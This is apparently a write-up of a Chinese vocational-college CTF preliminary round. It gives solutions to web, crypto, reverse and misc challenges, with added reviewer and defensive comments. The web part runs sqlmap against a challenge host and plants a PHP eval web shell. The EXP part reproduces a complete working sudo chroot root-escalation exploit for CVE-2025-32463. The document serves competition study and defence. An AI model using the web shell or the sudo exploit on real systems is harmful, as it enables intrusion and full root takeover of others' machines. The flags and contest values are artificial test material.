江苏省2025年领航杯高职组初赛wp



WEB

sqllogic

sqlmap一把梭

# Runs sqlmap against the `query` parameter of the challenge's search endpoint.
#   --columns  enumerate table columns in the back-end database
#   --batch    never prompt; take sqlmap's default answer for every question
# NOTE(review): the vulnerable handler is not shown on this page. If it builds
# its SQL by string concatenation, parameterized queries are the fix; WAF or
# access logs will show this run as a burst of requests varying only `query`.
sqlmap -u "http://123.56.252.211:10664/search/results?query=1"  --columns --batch

2345

#!/bin/bash
# Drops a one-line PHP file into the web root. The file passes the POST field
# named `1` to eval(), so whoever can reach /1.php over HTTP can run PHP code
# as the web-server account; the leading `@` suppresses PHP error output.
# NOTE(review): the page does not show how this script gets executed on the
# target; confirm against the challenge.
# Defensive view: keep the document root non-writable for the service account,
# watch it with file-integrity monitoring, and alert on new *.php files that
# contain eval( fed directly from $_POST / $_GET / $_REQUEST.
echo '<?php @eval($_POST[1]);?>' > /var/www/html/1.php


EXP

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
#                  @ Stratascale Cyber Research Unit (CRU)
#
# Reviewer notes (what the listing does, read from the lines below):
#   1. Creates a private staging directory under /tmp and works inside it.
#   2. Writes a small C source file whose constructor sets real/effective
#      uid and gid to 0 and then runs the chosen command through /bin/sh.
#   3. Builds a directory tree `woot/` holding its own etc/nsswitch.conf and
#      a copy of /etc/group, and compiles the C file into a shared object
#      under `libnss_/`.
#   4. Invokes `sudo -R woot woot`, i.e. asks sudo to use the staged
#      directory as its chroot, then deletes the staging directory.
# NOTE(review): why step 4 ends up loading the shared object with root
# privileges is not shown in this file; see the advisory for CVE-2025-32463.
#
# Defensive view:
#   - Mitigation: update sudo to a release that contains the fix for
#     CVE-2025-32463; do not rely on sudoers rules alone.
#   - Detection: unprivileged `sudo -R` / `sudo --chroot` invocations,
#     compiler runs that emit libnss_*.so* below /tmp, and nsswitch.conf
#     files appearing outside /etc are all strong signals.

# Staging directory with a random suffix; `${STAGE?}` aborts if it is unset.
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

if [ $# -eq 0 ]; then
    # If no command is provided, default to an interactive root shell.
    CMD="/bin/bash"
else
    # Otherwise, use the provided arguments as the command to execute.
    CMD="$@"
fi

# Escape the command to safely include it in a C string literal.
# This handles backslashes and double quotes.
CMD_C_ESCAPED=$(printf '%s' "$CMD" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g')

# The heredoc below is unquoted, so ${CMD_C_ESCAPED} is expanded by the shell
# before the C source is written to disk.
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/sh", "sh", "-c", "${CMD_C_ESCAPED}", NULL);
}
EOF

# Fake root tree: its nsswitch.conf names the shared object compiled below as
# the source for the `passwd` database.
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
# -Wl,-init,woot additionally registers woot() as the library's init routine.
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
# -R is sudo's chroot option; the trailing `woot` is the command argument.
sudo -R woot woot
# Clean up the staging directory once sudo returns.
rm -rf ${STAGE?}

CnHongKe{d615970bc4725ca2881af2c3feb0478a}

crypto

RSA

import math
from Crypto.Util.number import long_to_bytes

# Public key 1: modulus n1 and the public exponent e used with every modulus below
n1 = 153769429480303617525099446277946814072623699231110076379273887722757242160765481869559851273788780678450984350909422818822414195985904573538648872713001201186504130900961170308735898186613895138737221441119689327098326438415593690968056711455002853456141239017564889447759315623956965233123367775181646463569
e = 65537

# Public key 2: modulus n2
n2 = 104741687430424523714786838478654234509265282246882484069496166175381236589633075928091648124588105538388830214365853463306941016687480102941822292757450627262029551405196554479715290287606263306870475686502875025646881346075090866048971120570514658724118468822867615873644463611997913110796731320134873655071

# Public key 3: modulus n3
n3 = 127072523229705801684095912018779375714501598330019912184765605931059131688615461978170306674551422134507076144032643128022879195693745968822183650241544472860326887122832604708994522012049084908928620657112827244844150157797045263197408968602048073217656506951825187944811122881707826260751105841295980719593

# Ciphertext (the page does not say which of the three keys produced it)
c = 125315412895807928335784519235211559769835144982922061354440492259897286082293685249810142346705833079386440140091617837339173206443361677162294508248433428570994672827456799069304880986139464481853116113853220664980118573544406369602232717389746738053340393648121384563287904457831635232936065570243703247333

# Shared-prime check: when two RSA moduli were generated with a common prime,
# gcd() of the pair returns that prime and both moduli factor immediately.
# For key generation this is why every modulus needs fresh, well-seeded primes.
print("检查是否存在公因子...")

moduli = {"n1": n1, "n2": n2, "n3": n3}
pair_order = (("n1", "n2"), ("n1", "n3"), ("n2", "n3"))

# Pairwise GCDs, computed and reported in the fixed order above.
shared_factor = {}
for left, right in pair_order:
    shared_factor[left, right] = math.gcd(moduli[left], moduli[right])
    print(f"gcd({left}, {right}) = {shared_factor[left, right]}")

gcd12 = shared_factor["n1", "n2"]
gcd13 = shared_factor["n1", "n3"]
gcd23 = shared_factor["n2", "n3"]

# For every pair with a non-trivial common factor: factor both moduli, then
# decrypt c under the FIRST modulus of the pair only.
for left, right in pair_order:
    p = shared_factor[left, right]
    if p <= 1:
        continue

    print(f"\n找到{left}和{right}的公因子: {p}")
    cofactor_left = moduli[left] // p
    cofactor_right = moduli[right] // p
    print(f"{left} = {p} * {cofactor_left}")
    print(f"{right} = {p} * {cofactor_right}")

    # Standard RSA private-key recovery: d = e^-1 mod phi(n), m = c^d mod n.
    phi = (p - 1) * (cofactor_left - 1)
    d = pow(e, -1, phi)
    m = pow(c, d, moduli[left])
    flag = long_to_bytes(m)
    print(f"\n使用{left}解密: {flag}")

CnHongKe{RSA_Factor_collision}

简单的加密

from Crypto.Util.number import isPrime, long_to_bytes

# Given values
# xp..xt are the five masked values handed out by the challenge. The solver
# below uses xp ^ xq as p ^ q (and likewise for r, s, t) and finally recovers
# the flag as p ^ xp, so presumably each x* is one prime factor of N XORed
# with the same secret; TODO confirm against the challenge source.
xp = 128828824995833818676165843190145859846666191445111620864627041498262245661016272202610927130234264180024813400101811794568199789497304640888935610074527111735848036421350574354570382572071378693075501517651681167292494054044976417262720643752582801173329160691730958462999401681828410402624171054528487701250
xq = 93501864073083147736690555206986500352821561022722329409454421331522568252562336489380752764482378243293382437917734686276648657072965746683388224901642327741574194758168471142399011800111424540627796995389245806705358641695171454225060506776033714187806384242662410691416714061445225830804351743270693121372
xr = 105144997607517188001928065861721085151458500237362541144517526507829179446054616971830089339946039703176024806995930348425831607517690274084049167991564629577993384711086337120614791461782308672504887558723523293013197628325711741922614481250160020165126154205820339228701043543193135643189871148550415187754
xs = 94042557806455290017533368381016830673179627779094170764530475587270704798141833062898858761785570382721745371796537038402431708414498336803427155046473079552324742754878551180385512585438429908432609863042492144422038859638752336244969821224284661504394361784560575917229767348151089936323070236673875593712
xt = 115594002625792151804923109920889964947182530612219522161996511821327755748271726529203452220377801144567805098461740554220527265119790574899164813600030062051737769028153904929475006131181414206071792099760783853052588906957339435715505148998168863245482181389617108685315173753203529355444248415589964563266
# Public exponent; not used by the solver on this page.
e = 65537
# Modulus: the final check below requires p * q * r * s * t == N.
N = 13768342636197422304108795246275445967258641652316544453296082236160656248707267721982004373176441942766885427374230049495849901175065942806910339849529322895290083359465104367183088306236191085678167669511362291306468633216535747606889749365259254894702826523442727185050983898733297718141433625792021860096524462678559682734341585154525575647451003761903461413612824889932194540610920552883385126732378435297866284444297906528374412952296800239150586362936056193994908627667719326616138012726943831001847015267804010154104110559100836442001601924797615706682731073713164007060867783148342583181788458193661450452931842513273461021062581477545558571339021209337066016371165905298504298716810524028910898158345277213271752745059877760310870997947311552172141528759161534652496502254755758081938503065288753667472451654272929508728816800566840911928192632562488840795792835400802239092167722551047109923659984356369241614138483265802787439007856122854957666900281868710137011480905791834181203739248946762340824884326967370941119007669361328177488819208137083244171589394888655376850549724240949245226710926599304882791816475420018375478005474378090953210718637003297616537680898021315617608420694645032162429264914513746585824730288392980964264908404687944973472494605215440614705549788380303412439753538674566658859770480726822013741901657165959413925010146614104197911851836517581884355304343194397781221442417117454953952460810354720454937221995544494297618185953174037057112206638590168886580331712922507978337805445955280498907868853003
# Ciphertext supplied with the challenge; also unused by the solver below.
c = 3439394905782166441237506498757611634998714141967377265411887755183464830334310354099515705754305002453845144284962714493539352810656133902003574128040654732436372908629497886338030606669073185543483523322596108069277796053671242765145978964276489518561416450500971726036585469228102661139692387134453425034514593366519122828410223317311340019214789974257435550120228004472434150629204069661830887363254828526876378522199868362337226780796846608372402557761920573702765258750443160846557153090059064440434346724426460715389019886439838122991032863863340406305841768977271080103507522772324112521643561293330388467509344769916630100806468976640618082578062650775925726334041667328845728195479322234102185934327287314162854772787028760132802923512396238244054062505138988980024436004412713692853733234338730738962165223008806908494845064188562433621027494153054235518266396428664964688598368429580020076077007462387248780075769829446962399209903659674553446709085845766757501999096681846762793969620923766819178695482626653824918978362878571925866996523551223563857125205635241897776460707451261913577017129666152670711880793310692446330139817413931583810554880608441575471540050582658898956625685227344260622059696808482979718413943588193029974948213358126236143000182326987392324674999364168681277849168288214531908472309090186259078173635685596280815852978436316050958960030797731778562439965277821667360684967607722094740294605279702828546177255869762606665589928863794661494707994930291929877434775364757747351457394364263523273286543463

# XOR-ing two of the given values cancels whatever they have in common, so
# A..D are used below as p ^ q, p ^ r, p ^ s and p ^ t.
A, B, C, D = (xp ^ other for other in (xq, xr, xs, xt))

# Bit-by-bit lifting: the low k bits of a product depend only on the low k
# bits of its factors, so guesses for p can be pruned against N mod 2^k.
candidates = [1]  # p is odd, so its lowest bit is 1

max_bits = 1024

for i in range(1, max_bits):
    width = i + 1
    mask = (1 << width) - 1
    n_low = N & mask
    survivors = []
    for low_p in candidates:
        for bit in (0, 1):
            guess = low_p | (bit << i)
            # Multiply p by the implied low bits of q, r, s, t modulo 2^width.
            partial = guess
            for delta in (A, B, C, D):
                partial = (partial * ((guess ^ delta) & mask)) & mask
            if partial == n_low:
                survivors.append(guess)
    candidates = survivors
    if i % 50 == 0:
        print(f"Progress: bit {i}, candidates: {len(candidates)}")
    if not candidates:
        print("No candidates at bit", i)
        break

print(f"After {max_bits} bits, number of candidates: {len(candidates)}")

# Confirm each surviving guess against the full modulus; the for/else prints
# the failure message only when no candidate reached the `break`.
for p in candidates:
    q, r, s, t = p ^ A, p ^ B, p ^ C, p ^ D
    if p * q * r * s * t != N:
        continue
    print("Product matches N!")
    if all(isPrime(factor) for factor in (p, q, r, s, t)):
        print("All primes verified!")
        # Removing p from xp leaves the common mask, which holds the flag.
        F = p ^ xp
        flag = long_to_bytes(F)
        print("Flag:", flag.decode())
        break
else:
    print("No valid candidate found.")
CnHongKe{e34a953cceb1f52c34865cfc98b6ced1}

REVERSE

re4

key = [0x66, 0x6C, 0x61, 0x67]  # "flag"
cipher = [
    0x25, 0x02, 0x29, 0x08, 0x08, 0x0B, 0x2A, 0x02,
    0x1D, 0x5E, 0x02, 0x01, 0x53, 0x0E, 0x58, 0x05,
    0x5F, 0x59, 0x50, 0x50, 0x53, 0x54, 0x55, 0x55,
    0x02, 0x58, 0x56, 0x52, 0x57, 0x5C, 0x57, 0x53,
    0x56, 0x55, 0x02, 0x05, 0x51, 0x0D, 0x54, 0x02,
    0x56, 0x11, 0x61
]

flag = ""
for i in range(len(cipher)):
    decrypted = cipher[i] ^ key[i % 4]
    flag += chr(decrypted)

print(flag)
CnHongKe{2cf5b9b95175842d475106409cb7a5e0}

MISC

mv切片

CnHongKe{N3v3r_G0nna_G1Ve_Y0u_Up}

ftpconfix

在数据包56中发现Base58编码的数据:

9XUnxxRh9REHLRUSizjk3HJ1cfX7kgCtXxMyA9Sv7M8Z66ntasgqAhau88UbGGhwZA

解码(十六进制):

e869d6e17648b0fcac51ff60c0604f382bbf44daad80c5fc970c5a51d373a67a71218f9b7f73536f210b974af8f11071

在压缩包中发现如下提示:

=== CONFIDENTIAL FINANCIAL REPORT ===
Quarter: Q2 2024
Revenue: $12,450,000
Expenses: $8,210,000
Net Profit: $4,240,000

Key Metrics:
- Customer Growth: +18%
- Market Share: 22.4%

Note: All sensitive data is encrypted. Flag: CnHongKe{THIS_IS_A_DECOY}
Hint: Why not Base64? Try Base58 for better stealth.

Key hint: SHA256 fragment ; IV hint: time struct (!HBBBBBB,year,month,day,hour,minute,second,0) + zero padding

提取关键信息

- 密钥来源: ftp_key (需要SHA256哈希处理)

- IV构造方式: 时间结构 (!HBBBBBB,year,month,day,hour,minute,second,0) + 零填充

- 时间: 2024年3月15日 09:30:00

- 加密算法: AES (根据密钥长度和IV长度判断)

- 加密模式: CBC (根据需要IV判断)

构造密钥和IV

构造IV

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import hashlib
import struct

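# Ciphertext: hex form of the Base58 blob taken from the capture (48 bytes,
# i.e. three AES blocks).
ciphertext = bytes.fromhex("e869d6e17648b0fcac51ff60c0604f382bbf44daad80c5fc970c5a51d373a67a71218f9b7f73536f210b974af8f11071")

# Key: first 16 bytes of SHA256("ftp_key"), which selects AES-128.
key = hashlib.sha256(b"ftp_key").digest()[:16]

# IV: the packed time struct from the hint is 8 bytes long ('!HBBBBBB' is one
# 16-bit field plus six bytes), so it is zero-padded up to one AES block.
# The original listing appended nine zero bytes, which yields a 17-byte IV
# that AES-CBC rejects; padding to the block size gives the required 16.
# NOTE(review): the write-up text gives the time as 09:30:00 while this call
# uses second=12. Only byte 6 of the first plaintext block depends on that
# value; confirm against the capture.
iv = struct.pack('!HBBBBBB', 2024, 3, 15, 9, 30, 12, 0).ljust(AES.block_size, b'\x00')

# AES-128-CBC decryption followed by PKCS#7 unpadding.
# Key and IV are both derivable from material inside the capture, so the
# encryption layer gives no confidentiality to anyone who holds the pcap.
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = unpad(cipher.decrypt(ciphertext), AES.block_size)

# Result
print(plaintext.decode('utf-8'))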
CnHongKe{FTP_Exf1l_v1a_Mult1_Ch4nn3l}